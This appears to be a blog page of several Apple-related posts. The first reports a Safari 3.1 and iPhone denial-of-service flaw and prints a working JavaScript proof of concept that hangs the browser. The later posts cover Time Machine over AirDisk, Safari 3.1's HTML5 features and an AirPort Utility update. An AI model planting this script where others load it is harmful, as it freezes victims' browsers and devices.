Security-Protocols

Georgi Guninski has discovered a denial of service vulnerability in Safari 3.1 which causes the browser to hang, and not crash. This DoS also affects iPhones running firmware version 1.1.4 and, all other earlier versions.

When visiting a site with the malformed JavaScript, the iPhone will lock up becoming causing the user to have to reboot the phone. The current workaround is to disable JavaScript on your iPhone and or iPod touch.

Below is the source of PoC which will trigger the hang (not a crash).

Copyright Georgi Guninski

Cannot be used in vulnerability databases

Especially securityfocus/mitre/cve/cert
SCRIPT
var s=String.fromCharCode(257);
var ki=”";
var me=”";
for(i=0;i<1024;i++)
{ki=ki+s;}
for(i=0;i<1024;i++)
{me=me+ki;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += me;

alert("done generating");
var fuckbill=escape(ov);
alert("done escape");
alert(fuckbill);
SCRIPT


No I am not joking either. Apple has finally released a Time Machine update, as well as AirPort Firmware 7.3.1 which enables Time Machine over AirDisk. Now, AirDisk is still not all that stable but it does work. I am still using an old Mac Mini for my file server / Time Machine backup system since its much more stable than using AirDisk on my AEBS.

So what you need to do is apply the AirPort Update 2008-001, then install Time Machine and AirPort Updates 1.0. Then launch the AirPort Utility and you should be prompted to update to firmware 7.3.1. If not, choose you can “Manual Setup” then choose “Upload Firmware” from the Base Station menu.

So the next question is.. where are our encrypted Time Machine backups? This was a feature in early builds of Leopard, but was yanked out for the final release.

Today, Apple has released Safari 3.1 which supports HTML 5 which introduces new CSS animation, HTML5 media support as well a downloadable fonts.

CSS - animation capabilities has support for transitions, and also animations which allows you to do CSS animations as well as Transitions. See my demo below:

< video src=sample.mov autoplay /video >

HTML5 Media Support - The new HTML5 “video” and “audio” elements allow you to add native support for embedding video and audio content in web pages. They also provide a rich scripting API for controlling playback. This makes is almost as simple as adding an image to a webpage:

Downloadable Fonts so you can link to actual font files within your CSS, instead of having to rely on common which are available to browsers.

The Safari 3.1 also fixes 13 security related flaws most of them being boring cross-site scripting issues. I have started fuzzing Safari 3.1 HTML5 markup elements and the CSS animation stuff to see what new flaws they have introduced in 3.1. I will update this post with what new bugs I find.

On Tuesday, Apple released AirPort Utility 5.3.1, which is the software to control the AirPort Extreme Base Station, AirPort Express Base Station and Time Capsule. AirPort Utility 5.3.1 is available for download either using the Software Update and or directly from Apple’s Web site. Apple has indicated that the AirPort Utility 5.3.1 “includes general fixes and compatibility updates” for AirPort Utility, AirPort Base Station Agent and the AirPort Disk Utility.

So im sure everyone is wondering if 5.3.1 will enable users to use an attached drive for wireless time machine backups on an Airport Extreme? The answer is NO. Thanks Apple!

AirPort Utility 5.3.1 Download
http://www.apple.com/support/downloads/